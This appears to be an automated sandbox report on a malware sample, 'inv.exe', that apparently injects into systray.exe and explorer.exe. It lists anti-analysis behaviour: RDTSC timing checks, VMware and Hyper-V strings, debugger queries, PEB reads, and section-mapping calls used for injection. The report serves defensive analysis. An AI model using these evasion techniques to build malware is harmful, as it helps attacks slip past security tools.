          Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\inv.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\inv.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\systray.exeRDTSC instruction interceptor: First address: 00000000007398E4 second address: 00000000007398EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\systray.exeRDTSC instruction interceptor: First address: 0000000000739B5E second address: 0000000000739B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\inv.exeAPI coverage: 7.7 %
          Source: C:\Users\user\Desktop\inv.exeAPI coverage: 1.8 %
          Source: C:\Windows\SysWOW64\systray.exeAPI coverage: 9.1 %
          Source: C:\Windows\explorer.exe TID: 6996Thread sleep count: 209 > 30
          Source: C:\Windows\explorer.exe TID: 6996Thread sleep time: -418000s >= -30000s
          Source: C:\Windows\SysWOW64\systray.exe TID: 6880Thread sleep count: 132 > 30
          Source: C:\Windows\SysWOW64\systray.exe TID: 6880Thread sleep time: -264000s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\systray.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\systray.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_009929D4 FindFirstFileExW,
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_00992D90 FindFirstFileExW,FindNextFileW,FindClose,
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_009929D4 FindFirstFileExW,
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_00992D90 FindFirstFileExW,FindNextFileW,FindClose,
          Source: explorer.exe, 00000003.00000000.263531873.0000000008A32000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000003.00000000.263531873.0000000008A32000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000003.00000002.1324843429.00000000048E0000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.264974146.0000000008CC6000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.259290184.00000000059C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000003.00000000.264159036.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.264159036.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
          Source: explorer.exe, 00000003.00000002.1324843429.00000000048E0000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.264159036.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
          Source: explorer.exe, 00000003.00000000.263820453.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
          Source: explorer.exe, 00000003.00000000.263820453.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000003.00000000.260426292.00000000069DA000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD002
          Source: explorer.exe, 00000003.00000000.259290184.00000000059C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000003.00000000.259290184.00000000059C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000003.00000000.259290184.00000000059C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\inv.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\inv.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\systray.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_0040ACD0 LdrLoadDll,
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_00992183 IsDebuggerPresent,OutputDebugStringW,
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_00971120 LoadLibraryA,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetConsoleWindow,ShowWindow,LoadLibraryA,RpcMgmtEpEltInqBegin,NtCreateSection,NtMapViewOfSection,CloseHandle,CallWindowProcW,
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_009950BD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_00971000 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_0097B073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_0099519E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_0097B101 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_00995100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_00995143 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_009952A8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_009952EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_00995264 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_0099531D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_009950BD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_00971000 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_0097B073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_0099519E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_0097B101 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_00995100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_00995143 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_009952A8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_009952EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_00995264 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_0099531D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0481849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048D8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048C14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04886CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04886CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04886CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048D740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048D740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048D740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04886C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04886C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04886C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04886C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0483BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0483A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0489C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0489C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0482746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04832581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04832581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04832581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04832581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04802D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04802D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04802D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04802D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04802D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0483FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0483FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048D05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048D05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048335A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04831DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04831DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04831DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04886DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04886DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04886DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04886DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04886DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04886DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0481D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0481D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048CFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048CFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048CFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048CFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048B8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0480AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04813D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04813D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04813D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04813D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04813D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04813D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04813D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04813D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04813D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04813D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04813D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04813D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04813D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048CE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04834D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04834D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04834D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048D8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0488A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04843D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04883540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048B3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04827D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0482C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0482C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0489FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048D0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048D0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048D0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048846A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04848EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048BFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048336CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048D8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048316E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048176E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0480C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0480C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0480C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04838E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048C1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0483A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0483A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0480E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048BFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04817E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04817E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04817E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04817E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04817E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04817E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048CAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048CAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0481766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0482AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0482AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0482AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0482AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0482AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04818794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04887794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04887794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04887794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048437F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048D070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048D070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0483A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0483A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0482F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0489FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0489FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04804F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04804F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0483E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0481EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0481FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048D8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04809080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04883884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04883884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048490AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0483F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0483F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0483F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0489B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0489B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0489B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0489B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0489B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0489B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048040E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048040E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048040E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048058EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048D4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048D4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04887016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04887016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04887016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0481B02A mov eax, dword ptr fs:[00000030h]
